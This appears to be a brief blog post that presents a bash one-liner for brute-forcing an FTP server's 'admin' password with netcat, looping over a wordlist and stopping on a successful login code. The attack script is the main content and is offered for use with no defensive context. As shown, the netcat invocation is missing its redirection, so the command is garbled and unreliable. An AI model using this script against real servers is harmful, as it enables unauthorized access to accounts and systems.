Linux - Netcat ftp brute force bf, BF - brute force attack

Netcat ftp brute force bf



cat list|while read lines;do echo "USER admin">ftp;echo "PASS $lines">>ftp;echo "QUIT">>ftp;nc 192.168.88.28 21 ftp2;echo "trying: $lines";cat ftp2|grep "230">/dev/null;[ "$?" -eq "0" ]&& echo "pass: $lines" && break;done

The topic on Linux - Netcat ftp brute force bf is posted by - Math

Hope you have enjoyed, Linux - Netcat ftp brute force bfThanks for your time

Tech Bluff